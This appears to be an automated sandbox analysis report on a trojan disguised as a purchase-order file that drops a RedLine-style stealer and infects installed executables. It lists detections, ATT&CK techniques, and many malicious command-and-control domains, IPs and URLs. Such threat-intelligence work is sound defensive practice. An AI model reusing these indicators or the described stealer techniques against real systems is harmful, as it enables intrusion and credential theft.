Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.1278ff50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.build.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.127db188.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2069513140.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: microsofts.exe PID: 2172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_Redline_BTC.exe PID: 4340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_004741BB
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,	0_2_0046483C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0047AD92
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_004741BB
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,	2_2_0046483C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	2_2_0047AD92

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	331 Windows Management Instrumentation	2 LSASS Driver	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	2 OS Credential Dumping	12 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Windows Service	1 DLL Side-Loading	4 Obfuscated Files or Information	NTDS	238 System Information Discovery	Distributed Component Object Model	121 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Scheduled Task/Job	2 Valid Accounts	12 Software Packing	LSA Secrets	1 Query Registry	SSH	3 Clipboard Data	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	641 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Windows Service	1 DLL Side-Loading	DCSync	341 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	212 Process Injection	322 Masquerading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Scheduled Task/Job	2 Valid Accounts	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	2 Registry Run Keys / Startup Folder	341 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	212 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	50%	ReversingLabs	Win32.Trojan.AutoitInject
RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
oshhkdluh.biz	54.244.188.177	true	false	unknown
jpskm.biz	34.211.97.45	true	false	unknown
ftxlah.biz	47.129.31.212	true	false	unknown
vjaxhpbji.biz	82.112.184.197	true	false	unknown
pywolwnvd.biz	54.244.188.177	true	false	unknown
s82.gocheapweb.com	51.195.88.199	true	false	unknown
ifsaia.biz	13.251.16.150	true	true	unknown
ytctnunms.biz	3.94.10.34	true	false	unknown
lrxdmhrr.biz	54.244.188.177	true	false	unknown
vrrazpdh.biz	34.211.97.45	true	false	unknown
tbjrpv.biz	34.246.200.160	true	false	unknown
jhvzpcfg.biz	44.221.84.105	true	false	unknown
saytjshyf.biz	44.221.84.105	true	false	unknown
xlfhhhm.biz	47.129.31.212	true	false	unknown
fwiwk.biz	172.234.222.138	true	false	unknown
typgfhb.biz	13.251.16.150	true	true	unknown
npukfztj.biz	44.221.84.105	true	false	unknown
esuzf.biz	34.211.97.45	true	false	unknown
sxmiywsfv.biz	13.251.16.150	true	true	unknown
przvgke.biz	172.234.222.143	true	false	unknown
dwrqljrr.biz	54.244.188.177	true	false	unknown
myups.biz	165.160.15.20	true	false	unknown
gytujflc.biz	208.100.26.245	true	false	unknown
yauexmxk.biz	18.208.156.248	true	false	unknown
gvijgjwkh.biz	3.94.10.34	true	false	unknown
ssbzmoy.biz	18.141.10.107	true	true	unknown
knjghuig.biz	18.141.10.107	true	true	unknown
yunalwv.biz	208.100.26.245	true	false	unknown
gnqgo.biz	18.208.156.248	true	false	unknown
deoci.biz	18.208.156.248	true	false	unknown
brsua.biz	3.254.94.185	true	false	unknown
iuzpxe.biz	13.251.16.150	true	true	unknown
nqwjmb.biz	35.164.78.200	true	false	unknown
wllvnzb.biz	18.141.10.107	true	true	unknown
cvgrf.biz	54.244.188.177	true	false	unknown
qaynky.biz	13.251.16.150	true	true	unknown
lpuegx.biz	82.112.184.197	true	false	unknown
bumxkqgxu.biz	44.221.84.105	true	false	unknown
qpnczch.biz	44.213.104.86	true	false	unknown
api.ipify.org	104.26.12.205	true	false	unknown
vcddkls.biz	18.141.10.107	true	true	unknown
acwjcqqv.biz	18.141.10.107	true	true	unknown
vyome.biz	44.213.104.86	true	false	unknown
uhxqin.biz	unknown	unknown	true	unknown
anpmnmxo.biz	unknown	unknown	true	unknown
zlenh.biz	unknown	unknown	true	unknown
lejtdj.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://przvgke.biz/rvac	false	unknown
http://jhvzpcfg.biz/ccaldaoawyay	false	unknown
http://typgfhb.biz/m	true	unknown
http://ssbzmoy.biz/d	true	unknown
http://lrxdmhrr.biz/gxaexbrilqhff	false	unknown
http://lpuegx.biz/caxqycgeiaamd	false	unknown
http://pywolwnvd.biz/tynxrhlkri	false	unknown
http://fwiwk.biz/yr	false	unknown
http://myups.biz/ewwexq	false	unknown
http://dwrqljrr.biz/ikvygvnodbxw	false	unknown
http://ssbzmoy.biz/mrl	true	unknown
http://gytujflc.biz/hvyr	false	unknown
http://ytctnunms.biz/rnre	false	unknown
http://cvgrf.biz/smyj	false	unknown
http://lpuegx.biz/ioeeuacevdof	false	unknown
http://ssbzmoy.biz/dggpmrspif	true	unknown
http://cvgrf.biz/xefutga	false	unknown
http://knjghuig.biz/vuaobjwmdbxko	true	unknown
http://yauexmxk.biz/tkikmchfy	false	unknown
http://bumxkqgxu.biz/hnkvsfse	false	unknown
http://deoci.biz/mytb	false	unknown
http://iuzpxe.biz/fapfitlarmcnk	true	unknown
http://tbjrpv.biz/yfkb	false	unknown
http://wllvnzb.biz/vwiainnwhhxhmrl	true	unknown
http://lpuegx.biz/yeeuocokpp	false	unknown
http://lrxdmhrr.biz/unbrcr	false	unknown
http://saytjshyf.biz/vf	false	unknown
http://nqwjmb.biz/mag	false	unknown
http://qaynky.biz/xraiohcidq	true	unknown
http://gytujflc.biz/pyjgudwdt	false	unknown
http://ftxlah.biz/gs	false	unknown
http://tbjrpv.biz/fkekmmmc	false	unknown
http://oshhkdluh.biz/hlqwiqs	false	unknown
http://sxmiywsfv.biz/wgsqpusbi	true	unknown
http://vjaxhpbji.biz/spftv	false	unknown
http://xlfhhhm.biz/uxri	false	unknown
http://gnqgo.biz/lix	false	unknown
http://deoci.biz/prvlplgfktyghiuq	false	unknown
http://yunalwv.biz/qsp	false	unknown
http://nqwjmb.biz/swl	false	unknown
http://vrrazpdh.biz/qsxryrm	false	unknown
http://vyome.biz/b	false	unknown
http://fwiwk.biz/bql	false	unknown
http://jhvzpcfg.biz/qsmoxnmhx	false	unknown
http://saytjshyf.biz/sattbfx	false	unknown
http://jhvzpcfg.biz/ccrsdbhein	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://13.251.16.150/or	alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://13.251.16.150/wgsqpusbi	alg.exe, 00000006.00000003.2767578204.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2767578204.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/ngs	alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107:80/hudnfeopxibfg	alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/sO	alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/3	alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/1	alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.211.97.45/sywsqcciwings	alg.exe, 00000006.00000003.2788435260.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://208.100.26.245/jfogddQBrows	alg.exe, 00000006.00000003.2478943673.000000000057C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.246.200.160/gobhbstm	alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://3.94.10.34/dwm	alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.213.104.86/kfucjjkorih	alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/s7	alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://13.251.16.150/1gk	alg.exe, 00000006.00000003.2767578204.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://208.100.26.245/eaff	alg.exe, 00000006.00000003.2528797905.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2516552846.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2478943673.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2504519718.000000000057C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://47.129.31.212/w	alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.221.84.105/	alg.exe, 00000006.00000003.2156815430.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://54.244.188.177/s3	alg.exe, 00000006.00000003.2517221404.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.ip.sb/ip	microsofts.exe, 00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp	false	URL Reputation: safe	unknown
http://44.221.84.105/ngs;	alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.221.84.105/ccaldaoawyay	alg.exe, 00000006.00000003.2767578204.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2827357031.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2657080595.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2866913442.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107	alg.exe, 00000006.00000003.1983164372.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1943793685.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.213.104.86/3	alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://47.129.31.212/P	alg.exe, 00000006.00000003.2827357031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.211.97.45/n	alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107/hudnfeopxibfg	alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.208.156.248:80/prvlplgfktyghiuq	alg.exe, 00000006.00000003.2262144345.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://44.213.104.86/fkolun	alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.221.84.105:80/qjmcjynbe	alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.1	alg.exe, 00000006.00000003.2183000451.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2100147605.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183840465.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135520274.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156038418.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2117644955.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134367323.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2145188549.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2202750803.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2097746402.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135821312.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2099434092.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2158059198.00000000005A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://3.94.10.34/unxx	alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.246.200.160/gobhb	alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://47.129.31.212/3	alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://208.100.26.245/k	alg.exe, 00000006.00000003.2505676462.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.246.200.160:80/gobhbp9U	alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.246.200.160/Uw	alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://172.234.222.138/yrgsfg	alg.exe, 00000006.00000003.2202750803.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.211.97.45:80/sywsqcciw	alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.211.97.45/	alg.exe, 00000006.00000003.2894328547.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
